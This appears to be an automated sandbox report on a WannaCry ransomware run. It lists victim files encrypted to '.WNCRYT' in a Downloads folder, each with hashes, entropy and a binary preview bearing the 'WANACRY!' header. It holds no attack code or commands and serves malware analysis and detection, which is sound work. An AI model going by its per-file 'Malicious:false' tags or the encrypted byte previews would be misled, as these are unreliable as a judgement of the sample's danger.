                                                  SSDEEP:24:bkiAAB+k2Ubc0pxPfsishYAFPCpMMZwb2KtjB9TEDUjubz49cZDL0DjjM:bkiAyp2UbhpxXsiqxCphk2QTEIJcJ5
                                                  MD5:4F336418442A64242CF5B8132DBA0CE4
                                                  SHA1:598EB1DF085451B0048E9568D0DDE2AC9D5640D5
                                                  SHA-256:C7B6E058B3F904D7163226603ABD6EA9061F2E1296FE405F8E10798B81CD6AC7
                                                  SHA-512:E0061EBF4A9A902F900FB18AC4234A1CC7AEE6F841ECF869E83DE5A6F5B025B404C33CB1F3B8D0F5A173455BF397DDCAF2E2790CB16D28AE0416DB7A89FF8E8A
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.......!."..................u:.......4"..N[d...........5?.yP...~.cU.hq....J....K.".+.n[.@.:.......>...u...w.5........(~..~..V..%...x...}.4...U.E9...>.gxYlYF-.g......._..@..\Q.s..\$.|....L.V......*.1.....$.;.......w....p[.o......!0.......Y..y.0.v................Gx.......U.......'h/..m&.Q.U..[v..#,Al..@x){.~....(..N.X..Hx.L...nAw.(.vnlV..T.h...Es....u.7.$.0...4.u..x?g.j.`R+6..7uE...r.(.?..r.%.....8..<Z.P[0A*.@...yo`.=,Sf.s.|G;.@....f.....0.......*]7.......f...j.~.a...<`.V......e.0.f....=..h:..;....#.D/....5...%.2HJ..../$.W.-nVE.....l4.S9..6DO.(?P.w....N.?....z.Cs.+.."..0.@...a..Z..@...L..N..7.h...r.U.A...sw..}..mR.M.EVn..Af..&.uA....$....g.....h/.L.WL..QM...g..Yt.........N...`.R.f.3...bB..iI~.Q.d...U`...^(.B..75M.%.ug`..M.]....T..l..y`.n..H...L%.b.n.'......k....A.C.'X).TO..0GL.d4n.......*...........8..n.".z._.=~.. .....P.."....9.-X.Wn...#^e...\.^;..0j.......i.<.,...$..\B..NA..<Jv".m`,...B......t.t....4..r._.*N..#...u.z..nm:..:..

                                                  C:\Users\user\Downloads\EOWRVPQCCS.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.855157527838755
                                                  Encrypted:false
                                                  SSDEEP:24:bkPGRDyshqYk49vQRAemDzYwRf+sUKVfOE4XbrThgu23/IOVK0pJs3Q3:bkduqDKvQGrVU+F6dgBK0pJsg3
                                                  MD5:E646AC47CE9C0B58356BD0171411C72E
                                                  SHA1:18EF8551CBB1879274F079F30EFFBB8400781F1A
                                                  SHA-256:90F144BE973A86100D0DCE9FF16B6ED4B26D73181DBEE06C97EF091F3095DC3B
                                                  SHA-512:90981C9496DCBA000A1F461BCF29EA741265147B6B37612C77B48F18396B59A1677C62A152B40441C370BD3639DDD581235BB593007B73B451349811417E45AC
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!...........=....<.P.Y...c..1n.J&..B%..0..N.....#..8$e.G.cM..W.J..z.{ ...........~.D.....+7.S...`j..[....$.v_...R............Lr.....X..q...i.....N.@...2..........B....y..z...x......t@3..Yt.w..F6B..:...$.X.B.....j{O..<..X..W5..o.......Xun;...q.%...............e.:.....bo...TR.....(.].}._..ZDq3....:..i.C.;c...F.5o!..=........i].^|.ZiwZ.+.fC.W.&@+.IT*.9.o.B.0...?.g...p2r!a.......).i.N...>..|@..?..12....6^~.._6.2.o.S....z.Q...._.}l..).....x08...O.........y..^..D..Ha.q.....<S.........F.+.l|..!.b.H...x..@.t.b...W...g...FHP.R....F......i..8......\...jQ...6.....`.B8OddKA.f.7a.. r....hx...[{.C:<.....7R+...1.\..\...g....5<...I.....Y?X....<0/...E..;g_..9v.....?..R.#...Z.......{p....*.7..|.......2U:ms.wI......?..H.....Z\..{L.Lz...k,..`=.*...cz.....FqT.....A..+...1X.5....).S.H".W1...MB..WV....~...7.=~9.|.W.}..>gUf...!....V..?.0V#....D...?..'s......>.i.p,u............:.h...0..Y/...pb..m..N..y.7...... .M.....ns..[...B.m28\.,at.mo..*..fFUD.7Zj&.c.#.B

                                                  C:\Users\user\Downloads\GAOBCVIQIJ.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.811984123982203
                                                  Encrypted:false
                                                  SSDEEP:24:bkgb8G4xpn9zA200t9gkw4ldRuCBF9YMjJB30ALrbUMldkZUH:bkgb8GcndD0UKSBFK+JZBhgZUH
                                                  MD5:0516F42417A3F04C707ADAC115D2CF00
                                                  SHA1:A2648753C15BDDD23118709F0A98E77709289901
                                                  SHA-256:22106308BA259C60ED8B1740E7C37EA52105D84EF624C32AADD1E6FF91DE4FD1
                                                  SHA-512:A501E083458624AAF15DF7CC4F77EFDD63AF45FA4A4B16CCC2810092F73339327A6A36D5B4EC50510130D787A90D3BA7A1515B2022628E87FF0883826DDF0E72
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....M._.H.5t._..e..O.n...mZ..9..4.....\v.<..{.2.fL..z|..?.k...D...R:...E.. .O-%.^#r...Rk.W..'....n..Q.%E.v...;."......4.......h$...?3i.v..)...R..:....B....=J.....n...G.!..%.t.....F.V...;*..{....D.7yL.H.<r.r....|.V6H..`j.+..Tz....wS.'F.p.F...,..[...............".8_.O.Z.].z.L7.V..H.;....?uPb..U?...g.5.W..;..u}D.7.,D..,....Q.n..e.@..g{.....A.vs.Q5S(a...)!..&_.e.........Q...e?..;/.l.&.).%.o.!,b...i...^sS..A.m.....L...0..........&...|....../....A<O.H...Q}.;5pA5.'.....V'?O.........M..]d)...S".v.f.r...Y.........Y..9<.%B.fZ.e.\.:.....[].w..<,.(LC....}^..v...5.......#QtA........{$.y....4K....'.....g.q..G?^A....6zf1.a.).q..#}.(..z....i...SR.m.:.y..=.@tqYM.f%j..c~.q@<|.WI.F....%=D.......6N.C..E..3wY...v.IB..|f...Kf......W?.0.....J..S.n$....+j]......g......;....n.Rw...x.KB......O..........6.5..X...fI.!AzgsML...x....y..s.h..qh.W_...;.k...a.qe.Y9..m....4,.@....u..*....].[o.<..J...$.........%bo|a.dd..$y$.Q.wO.5..qh.RfHB,.I..,.U..f......)..l...bYw..jE.....O.

                                                  C:\Users\user\Downloads\GAOBCVIQIJ.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.807958225155772
                                                  Encrypted:false
                                                  SSDEEP:24:bkP8tAzxbR0GDwisZvcYFCqTlX3uLTsMHPce6AZfqq2L1dHFaQToGEa8sTGcBObx:bkPWWbRHEl5X3P9iiL1d7ToGYm1mFrYm
                                                  MD5:5990554E5D93E2EFF0010F63A6C14086
                                                  SHA1:29E15061889B84D3DEB0F0D9BD833A4D8C321EAD
                                                  SHA-256:05B9FFFACD13D204A3AF9CCCECA1E3EFCA7CA5714208177880ABFAE7A45E0D37
                                                  SHA-512:6D202CED87AE35540CE3201BC56B637C8914DFA866FB57143A656D716261871AF5A85E977C2EF45D5A298D74F9431C1AD36E4C144A82965DF0FDAF5AC123F40D
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!......^?A......K'..F-....n.ZM..6.$.9.I.3.H.......N........ek...:.q-%......9.&P..@H..m4..U....H......P....!L I.........eV..pNh.V.Pc.IAO......AT......Nf.Y...l.8...'...;%...(.y..h..].=..n..kn..R#o.Dx...L.A.9..*k.....-..h.....X..49....t.y..9Y.<.M.^............|....Bu.S...l.L..>.w.<..W.Mq..iN../d..y......*.3....[u.....n4.~..~(_..{./V.W..v.[S...1..qR.D.Y..(.y$..$.~i.;._....+...g_.5.?...5.8.Ka.+......2i0e..@.F.....x*...[:!:.........Y6. ..A.Si.?..Y..jP..V'U.l.QB1..J6.\K. .$Y?.......rs.&P.+d.W.r.#u.Q..2.Y.l.x7.r[>.1..._B.(<U.....h......^<..xa...Y.1.!Q.M.>...u...|..[.....pm9.w.7.ph.Y.0...9M......^[.k..,....#...)b.|.....G..]{.P.....9oQ.P..ANX..nH.u.e.&._4i.. ..o...t.....G.6!.N.f.4.t.&4..1...-.....2..]..S.M1\J\=.>.3^..B..oH\....R..>.w..}1...;..P.B.l.S.V.7........._.0NW.#.T.<N}..M.[.....=.'....L.Q.....#...yTq...,md.r9=Jm..2....G...bz...@y.(.:...m.B*7....M9.Me..5;|r'..9#.Ad......K.7...tO|].-..8:..A..X.B.9.W..4B.P..*Pq.g.F.kO..:..]....*x..P9R...[a

                                                  C:\Users\user\Downloads\LSBIHQFDVT.docx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838863709126363
                                                  Encrypted:false
                                                  SSDEEP:24:bkVTf9A43k6VFre5gwGAKTuiykkvwXJ3RH95nyI6d8WuZ01ScumJRWXM1+QONvk:bkVTfbVVofKiaWwXT9udtl1EmnIM0fs
                                                  MD5:C2F6D5CF81F0ABE8F428E756F86F8C88
                                                  SHA1:0AC22974AD496109A795DF1E873BCD2B103581CC
                                                  SHA-256:7BFC58D74823893F67449E94F08E51F9FFF3883C0F1630466E4A2456E7726A92
                                                  SHA-512:981F7F35715B2F603FA36F121AF6275D8A78B6F31AF7BCD830E54DC6C583881EDFBDD5E48E65E295C9440A0E4B081E37481A32C21F1E695C2B81BBD2C29DD924
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....}>X.q!.:...*.2UQ2.2h.Ge&.!..6R...i~Q;t.^.I...n.p...)..L$o......z.f...R38\.u..F.a^..b.............&..G...:.l.a...rs...}.n..$X....{M..:(S6U;..x.+U.$......Vf.h.ME..-.....q..gW..}..;d..'...!>'.....D....h.N.9b.}...u{.U.GQ...p..B..,..L?.r..q..M.c...H'O................rD.|AY..5X..S.M..|U.'....6..>...C\,......p..R(`....B..u.b.....6.....0z%....g....I......S... ..3.$..... .......W&..!..........]...Jd9...._.S..HR......7g.?.y.Br.....5.!..XZg..a.4...d{..*O..,.......K.E<CA1.M-.j.*Q..sQ.H..rJ.B.'.....H.S.i.)*....4.V...?%E_+.p..o07=A....k......<........t..jtW...j....Uf....Q.......l.7%Y.nD..:.uv...i.@K<eG5Hg.........ne...x("..&z..:0.9 .Zz...3mT...; ....ob. .y.K.qA...:...6;..$...D..a.k.}..c.p..3~.9..H...R..............}..K.<z.y...Y...E`.%U#....nZ.d."O....6O.k....26_.$.T.(..yexQ..."...vW'W..$...k.+..[...........5..v:*w.O...Ef2v%..h.3....<._.o..(..y..iS...=n..%}..@]..Pt...L......kG...6.np.R.rV....#.........x..{.1..D.f67..4.n......R.C..8....3."4".B....OW

                                                  C:\Users\user\Downloads\NVWZAPQSQL.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.849975900566908
                                                  Encrypted:false
                                                  SSDEEP:24:bk3HRjpNVkFVQAGBG+eBnY6TPkHo0Kxr36Pkhk8F2T6sMNq1fD+6OajcPWlrG:bk3HpUG3eB9PkIVK8F2skfD+6Oajc+pG
                                                  MD5:6FF350E132C197D96B4366EC38BB6D36
                                                  SHA1:804880245B4A194BFBC341629EB08CAC4260CCAF
                                                  SHA-256:8F8CE9A8B0C444D7CA452F6E5C235AADDA9AB988FB949220FD131B2056EFBF6E
                                                  SHA-512:560E8596410B39697B57145CFFF3D8184E995A9A64F8C9B4ED1F17B673BF52266630BEF74858907E5F803C103983F7A48A4C87B3D4ED48B9DE37516F1EDF3A50
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....Z.%.h..0s......Pr.m.t?;`#m.....J...z....W.>P|a#>k.)#.5..........A...#.z0U.Ki.Z....,.....U4.b..-.....U.........&.......C'.A...... 7..Z.8...........I.w.Wcf...-.O..(;......1&...;.VpX9..\gQ..)..$.K.....C<a..G.....Pu.....(.]...S..[.x.....T..i.-.............0......R.}..U..aB....H..a.6?..%. ..5..O..%|.8.Ph....D.wx.....j......x......txF}..[-......H.n.}.u.r..k=U.)y|........g:........,(.V....H..'TL.|...3*.\}..'..v...E....9..*.).Bl.>T.....r..t..M2A.k3..wa.a..'..-n@.c...S..%x.H.4.s)K...;.AgI{.`c2.?U?....;h..S..G@.....>]e-%g.Q..".eb........s.n.....{.K.x..x.....a..."1/.6...o.....`b.........j../..y ..j.r..O.a.0....5h...%l.P..HRD..!.... D......{....d.."E.v{.;..Z..B..(j.....xa...........>~0.,9r......y..*...$X*...[.....:.{-.^.....O..9V..........R[...'zY.....$.c..?..F.....".q.$F.....nC..b5.%1>.#5S4.".y....s.F;v...s.$..rzF....'#*..+z..C.TZ..^o..km..iw=...3....7....*1=..:.<.F. ...n..e).O'\...+k..,......2./idX/._.2.Ua.F..}sG.w.......7.V.JK.5

                                                  C:\Users\user\Downloads\NVWZAPQSQL.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.838458580321408
                                                  Encrypted:false
                                                  SSDEEP:24:bk0ck+SsncnFglCxJka7pCmXsrYgtw3sg74KguW8bj5O8v:bkyucn2wJdsmXrga3sFsj5O8v
                                                  MD5:DEB1219D3C1D2DFABD5817915A984F46
                                                  SHA1:CEDD5C6B9D5585587B63BEAFD675731A306BF5D6
                                                  SHA-256:51E1E02AB589C5A775FC943E77C0B6B9E4DCBEC8C3AC85C6CCED2C98B4F01C2D
                                                  SHA-512:45C9DD368B5DA7368EB5876BBCF4D8902F95C3492B3E646A551A9C4984E29C6D64B3477027944DE0DA1B3059D7CB43D963F279012971CA539A24C56A6F623356
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!............+..g.....c.......g+.,..BZt..c.t.>U<.X..u.< ...Rd..v0%./...x...cBl/#...a*M.S.].....$...w....r.......P%..oh.)...7...C..#..^..+E.....XU......>..^D2..I[......z.\qi:.....(..W.`.;............!0z,.. o^..?|")....R....)...!6.9gy...H.(..v..J.$....F.4............V....Z....P...mGm.'..om.r..B..2[..w..T23,.!Mm......~....hZ...m?w}oHH..................q.g..7.....m.8+..A...rd4....{...UY.SW..w.XV......+$.Y..@gP...I.......Q.q:.0...:.+.EX.r.....Y..92..i......GP...9.H.Fth.Y.....-UW.a...Ve.!BB})6..I).1)......|.#..!}.&Vr..A..gl0....n..)..w...M.....X...c./{..@=..1o(..z..9...p....*.......D..+.....Ve.0p.].0Cf.....JU4....H..3...q......%...]...@..e.+..-Z...L......'q=(.(..........B..[S..^........o. .-.I<...S.....T\...F.V.1..4..:.l&[!.&zq#.....^3....=...`La.CP.../{"5...-.,.%4.#..}e./...5.p.g_.....&fU.3l...&..L....G=q..}q.....U.j.... .....WJ..EP..77.m...G..P...Y..^.E.....z.9.c..a....,J>..U..Hj.o.E.3..o....v.c..mMC.B~....I...../.w).p......~../ '.b....v.."

                                                  C:\Users\user\Downloads\PIVFAGEAAV.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.834222334168714
                                                  Encrypted:false
                                                  SSDEEP:24:bkSnTOXUBJyVzx77mPm3P/DdHwBjNirXoABykIYApQSDjUdrfKQBWnRw1O8:bkS8YJAx77f3P/DdK5iLTB3IYAGSDjUb
                                                  MD5:C9154BF36E9E7894034124BBF7112FF1
                                                  SHA1:4C91FDD1BE911E31974BDB22B37899EBB2D84A6A
                                                  SHA-256:74759CC05AFB8285B3022CAA7C46A9B492EC5DCA8FC4127F3724400140A0BCED
                                                  SHA-512:BB4630FB5412874BF01FC50E4EB1759375A83F34A4816B68036AC744F0444302F0D58E5426D3EFA74EAF6CF3B34E6ED9FD1BCEF067D3235530E278BC57845D89
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....O..5.._.`r.b...a..VA.Hb.R5..*.B.-.......wpN......."sn.}LF&|...5..fi.... ..*^.8......,n...N.t...BX..=...IN.t|......!S .\..D.rBi..+.K.4......6.h..Z..R.K.O...H..&*..x..Z,)..5fY...c...}1}...cXkj.....+.....M....kx....E..2NA...T...}....8(1|.-%...&.H.U.O..............e.\.h.A...i.F ....c.s.5*.s.D........;slF.U"pP..wK..4..o..H.Uv]..f4 ..Qz./.L.I..XAa.,..'.........[...5..&_T...O.{&.*ZD.....m...h.K.w.....iy....0.1>N....a..d.......N.^.!mh...6.M..H5...y.9-..F...[..3.v...Z.......D..n...........2.0@VN......s.h:..}.QOq......@N.1......Vg.\S.,{34jSO..M...lK.5..Me....../R_.v.0^..I;...c.c.TG....4.A..u...f.a."....$.m.9......@./...unQ"..l..RH.....0.g...((gx.E|.F.....]..N../..r....A9...I(..d.X.(...E]..\Kk.N...[....o......4.j.A.j.G....V...#*s.Q.n]...e-.......7.K.HP5}?.r.=..:..4r..bm......n..m'..Up#.J...XN..n.H`].^\.fI!.%.....<..........y.......u.D...u..'O..(.s...:..yX......t..[N.R.....^]O,R!....F.Yt..ctS.......!...y].R.....US..........ZM<..j..u...^.}

                                                  C:\Users\user\Downloads\PWCCAWLGRE.mp3.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.819127742949708
                                                  Encrypted:false
                                                  SSDEEP:24:bky2n8WjqCZniu4AGVE/7TP4dY6lD/XEWlq70zMNBkw8NCpPkfjPmDd7o:bky28WjZ67m7TwdlzUWlq70zMnkGcDmS
                                                  MD5:46E03594CB0BD00CA5A5E378933636F2
                                                  SHA1:B495084A9E753470D8857AC662184EE30A1D6AD5
                                                  SHA-256:2398908ADF3E9CCFAEECE05EE818C90C76C0E30455E3D74FEE8CD8C97DAF64EB
                                                  SHA-512:DC1D0180047D10F9F732E31076ABFD3295DAE9EBC12D1E8D5C9FCDB92373D9E62CC06C0FB830B9D916DC24EC56510900074E036C41063100703116CF2AF35F0C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....h.2...3.Z..]..{....*...|..g..S.).......].j....y.....$.`+#...:.A.D.O..._..k..K.]......;...y.l<(.-.....6..#*v..;8..'E`.U6..A..........:..`..@..P.?.y.tmNr..\.v..ly.....].....@./..v.fm.b.....9..%..D].&8..R.c..".e......._.P.l!z....G.J....t&....E................,..P.....k...I/.".{."=....]...\fM......[...f.Dc....D...-...=.....#.@%...g..n.&.zm..?.h8.Y.D.-.].l....Ua."x......X.....\....uC......h.8.*......0.....2.?.....M.0..R.._e..@X{.IJ}...`y.V.....`.XJ......l....>..}......rj."]`......58.......%.{?)....A.U.8..r...=B....5.....c.......Fi.JJ.....>n.A...fRp...'.yU.o....b..z`.'.{.].j..k..7O;....B.}.....c....g....oQ...>.e.......& K....."!7.Z7.uN.4m.'NM.........+.....B.'.h.N.h..k..R.}.w......w...Y..@...q*..I..8..9.t..M..6..Z.yb..e...8.SnT...P;.;;.e\.a.x5]TIJ.i.V ..K,i-].....s...y9./.=@.)..A.e..;y...2..3.\..ueH.54....}n-.......+..h..!.\I.}A..Y..TPVc..<....aJ:.I.nY.<.v.?.fR4..H...\.7.RK._.".D`.*:.<.fp...\...@`.9~n.:...7...AP>.6......

                                                  C:\Users\user\Downloads\PWCCAWLGRE.pdf.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8367109529083745
                                                  Encrypted:false
                                                  SSDEEP:24:bkm5hqfyh5CLtcXK0DPPWIwZD2zMq7jWe/sxJIXM3yRgpmjEw1QWR8Ge0XdrUjqq:bkkhqKmLWXKLDZD2Iq2e/sxJnyRgpwrk
                                                  MD5:5CF8BCD8E877DCD18344EE071EFA9988
                                                  SHA1:BE06FABCF53D7EA705E1219D008951F0BEB388D3
                                                  SHA-256:6603DCE04A70E2EF5596987085E637E85B829FCDD371C7E8A6F95E6C4C98BD52
                                                  SHA-512:F3DF8AB413A876BFEE7F5C1FB136D3E9F56762DCBD1E386E5251C24AD0352CB12CDF6BDE4090E6130D73611C1B2FCA340230F81D22B48A2B085788CCED861FF4
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....s....q.D`{..`4`.P.nR8...D.X.m.......5T..E.z."..zpZ...%.EP.0...._..k..X.6.K.']k...GF...N..^J+.d...^.R.d.j.J....Y.+.J.M.J.A.i...x.o.7......RA...x...[.Z..T].z...VY.N..K....tl......%.i.|.....Qc..`..F..z:).o-.pn..9..e..EY.....@p.......A.Yf.$.B$.+.L.............../f. ......S.t...>....].s..M..r...lSo...@...7Z#W...k.....M.6.-[..:P.M.8.......|E@...a.O.m..S?.....om........[..s..."-.~...>oh_]/.G...u......5se..'=J'.I.b= ....\.t.7.%...8..x&vf..iR.'.L.B..Z.a.O......+q".1.Y.z...|g...q..d.AN)}..*'~G.._{f}.!d.Jz.....M.b.z.U$.U.|a.$.vF...A..+.........P......v.&wu.:3.;n......H....3.u.y.....F7:..Fw"-..?..^Ug..x.J ]!..S.0-1.G..xJ...w...W.D,.....#*.).."......+...>1%z..,`G..VC..c......iV......V..G...a...Q..M.:F:...Y=...m...6..;....;.m.....&...[u.......z....-.Hs....<....5......^..$.PC...,7G)%q.o}H.....V.GI..Q.{..}].$....M.~...Hw#.y......k&5...&I.W%...c...L..a,mM..f/.............g.}...@..:D......FHm.....<.r..R.....4..f.../.....&D...6O9i. .Z.......o.q$..a`1.

                                                  C:\Users\user\Downloads\PWCCAWLGRE.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.823267939487966
                                                  Encrypted:false
                                                  SSDEEP:24:bk8zT1/wypS9agmTpMJUfxaZHCSAVKNuqPJSQ7XMNm12QbovcHiUz9R2Us:bk8zptpSELgyxaZfQK8mIg12/vyiM27
                                                  MD5:525A0649FEF34B4F81E6DB06A6FF4CDC
                                                  SHA1:DC187C9457E2ED4B53676F31205FDE169B84D6C4
                                                  SHA-256:65173F594FCDDE2297F5315B9358A6E0B55C6913DCDD489E859D594836E9B769
                                                  SHA-512:3635C9F801AA9F1D5FE8930960896356105D43DC8B9F3D7B12D6AD644CE713B5EB641DB8E458B6335F56D8F8F6E68416360633642320CC5CC2A3163B5EBD084F
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....=..1...6.U.!...:.g.BC.*..\...E.......Pz>N=.i...p..{HD.r8a.R.`../....F<:W....8..U./k.l...Q;PK....[.6...Z..x.CmhM?.......sD,...eT..r..3.A.re.{wB..@Q.d.......t..#....g..w....-.+.._S....7...i.t..!.......r.fp]}.Y..q....._...i....<....n..IP..Qc.v.:.$ky4...............oDP.|$..."...h..!....(...d..s!....CH\........n.......>R.wH4e+.).U.,8pq.\.].:.AeU......rC....E..t.....ha0.C..Lu".....}$......R....v........"..Y..]..@z.D....e=.l..Su"...Y....)..r.1[A..XDI.loj.r.......D..[.{]..e}.?.9.$]..I..9mv=T....7...W.'..EmB{:....[..5..:..'.....8..........H.z.-..e..].u....D:...R.(;...SC0..6y.....c.O6.-.K.Jjt.&.\N...v;=.n...#.{V..%.\......C..c.fn.......E...;..3-..@..w.......s`.1..x..Y.N,3.....G].91..u.U...x...M..)...g..I$v}...`....q..U4...z.Y.,|..6.~...'#...CglP.S...A+X*..*.W...1.d.U'....W....y/.G..C.......~./...m ../.+'l...@...y.T\.P..sL..%Q./..C?m.k.p..}.....%'.@.........y..[....}.R...0..&#....G(6..Sl1n...\.US......@ ....F.k.S..X.4..D.Pp..+V......

                                                  C:\Users\user\Downloads\QCFWYSKMHA.png.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.835498161095077
                                                  Encrypted:false
                                                  SSDEEP:24:bk4OUwwVzU3+88YYjxEm9QLagE/hzcKHobzvyICIvSMDbCP:bk4NJzUOTjxERLnQ+fbLvd6
                                                  MD5:72DFEB37ACC67B983749E8C74B46FC2A
                                                  SHA1:C31482D0ECC9BCC44384372087476BB598A56D0C
                                                  SHA-256:B0A2B11EC34E342FDE98961D74D72A822EEA979CA36A724F67AFF5090E775888
                                                  SHA-512:C96B37A4D54BD86416307448F06CA2ADE740DAE5B4D695984DEEA2A894BF74CC7883D42EF36A73D2ECA8D29FAD2BD14B976225C7EBF7D44357CFBC3E9AD1F131
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!....8..F..L......QxT.l3....s~...zp.....D`.+x.......H......-.)D.....h".K\..-.,z4...j..q....}p......p....F..`.7..Q..IM.....K.2%;..jx....&.. [B.....^...9o.x..:9c.....d0..L..1.........:.U>.MU6O<.....'LpX..S.....Y.....FJ6W.).Dq.jxc.x[...JS..^7....Vn..............c."l._.B..P. 5XY.D{Gj...D....X...n...8..... l.(.........!y*E[........6u.s.S..[.g.[`..........{..".Z.of.RP.`.<W..=..[.O.H<.2.6..;...A..`i.q.c.}..w. Y. ..@.1}..'......g...e..k..D6...@##q.,<.k..+........^.>"8..2.F.B.6!.0..P....m...m....gH.57..z..<4.....@..X7.Z.q....|...g2.X.~.*..&....ytiZv.0u9.Nar.;...^..G.z*...:..d....;..h.4.2@...9D...T).=.y...Jp.k.......'n...&._.,.k/$.7.U..r.<..R.o\..).9wKqfl.7.4...%.v...O9G.^?Z.8.y4...f..+../.wS._s-.X.[.....i+.B;,)....| ......).....v......?N..a.+..Z.....q/......;).......=f,.b..c;....=..jS=/..9[f..K........h..). C.h..k.t.i..q........J....9tT...._..c[.KE.....p..hkN..,x..u.x#.\.SN_.`W}...C..h..t..o.T.....I.u..-.Z7.!../..k..W....

                                                  C:\Users\user\Downloads\QNCYCDFIJJ.jpg.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8499076220924024
                                                  Encrypted:false
                                                  SSDEEP:24:bkzavLWVlAMaudXjQJDdQtdM/ik6goq9lzucH7I0ZGJlN8Wy3r7IB:bkigKudX8JDKtGieoulzuy7Il8HK
                                                  MD5:6D335E493CF884A70D790D21957D9B4C
                                                  SHA1:6B4D8AA5A3A7D2A833414717D6B0F6FAB0BE03EA
                                                  SHA-256:FEE51911873E925840155B3EA8A7FF35CA273F7BB6C47D8786BDB1E06F52EA27
                                                  SHA-512:9775BEF0D7F2459AD1E4F36D1FBA55E814D0FA1E3B767935C169D169474435C2C1503D03D089C5E6B6D3D9BF9A27EB7312FE8FE2DB20606AC73A0FFDBEE5B16C
                                                  Malicious:false
                                                  Reputation:unknown
                                                  Preview:WANACRY!.....E.K.*....".\.Qc.I...8X.j...Q.......a@$....&.m.hdx....'.....oE....+...@$h.U.vQ<l.".....1T=b.M.......=..L.....W_.T.I...[.....l.J.N....x.D1g..MUT.....:.el.C.'.%..r..dB.........R...Z..."R.A.@.......Lk............56$....H.:..v.*........a..<.....I.............g...2..G.D.......?.q...q...t..w.S.....9.1..P<....T..dg.KUE..,u........G.6...y...@.......l..W........kd_h..deV.1.C{.u..<.z.C.Y.!C.z|d):5L...Q.>..G....z0O..a..qG.}...6...C.a.m.lD..&.d5.@..G%..8.R.b:...&!.(.l......p.>gq.u.K*K..m.nYP.].#...^tp..J.<.6.g..v.....X6d[u@.)..}q.....(J|..f.g<N.W.6....O..`.P&3d....h....:.E.s.=W..U0._s..W.1RS.{.}@B....X...'A........~...>.B..Z...../#.... 8.y...rD....^$<.w.Q...i.|.BV......'....-.J..+.j....}Q..Sv.....1.ab...b&<.s...t...0.D.$.5PFn..........q[o...F.i.k..H.I.F.,v.."..bRR.....{.p...r..Y.B;.Gn...k.n..&..... ~.O..J..Mc ],la/`...W.{....:..:.C....-.N..-R'.K....*.)9@...L;..e)yx.Na.!.m.c.&y..&m.g..F..6=y,........9...+...9f.=...A..r..t......g*.....E.....c..

                                                  C:\Users\user\Downloads\QNCYCDFIJJ.xlsx.WNCRYT

                                                  Download File
                                                  Process:C:\Users\user\Desktop\WannaCrypt0r.sk
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):1320
                                                  Entropy (8bit):7.8310281743865335
                                                  Encrypted:false
                                                  SSDEEP:24:bkzfHAypy1EFokhyB9Fg0+p+srtOxsabWZxHqmbnCRZx4Hn1qZmu:bkzvAUASThy9jsrtOGabWZxHgv4C
                                                  MD5:941586C6E485BD375206922574C513C7
                                                  SHA1:B930B5D9EA2D1705A447714AA17B8C4858EA28DE
                                                  SHA-256:2A5BC380F46EDF84E64EC578474ED3916B0FBC0C59529F850873E5587F576774
                                                  SHA-512:BA3B36B9C17FD2EB45E6006038CA86CE0B6DF0AD4F525DD0CCC72DA82604649950C44D37436F98B0D14342232BFC4B4EDE2A28DC088908201CDE693DC4E3EABC
                                                  Malicious:false
                                                  Reputation:unknown
